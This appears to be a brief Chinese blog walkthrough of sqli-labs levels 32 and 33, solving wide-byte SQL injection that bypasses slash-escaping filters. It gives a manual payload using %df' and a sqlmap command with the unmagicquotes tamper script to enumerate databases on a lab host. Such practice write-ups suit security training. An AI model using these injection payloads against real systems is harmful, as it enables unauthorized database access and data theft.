本文主要是介绍sqlilabs第三十二三十三关,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Less-32(GET - Bypass custom filter adding slashes to dangerous chars)
手工注入
由 宽字符注入可知payload
成功触发报错
http://192.168.21.149/Less-32/
?id=1%df'
要写字符串的话直接吧字符串变成ascii码
注意16进制的表示方式
自动注入
sqlmap -u http://192.168.21.149/Less-32/?id=1 --tamper /usr/share/sqlmap/tamper/unmagicquotes.py --dbs --batchsqlmap宽字节绕过只需要加入脚本
Less-33(GET - Bypass AddSlashes())
手工注入
和上一关一样
自动注入
和上一关一样
这篇关于sqlilabs第三十二三十三关的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
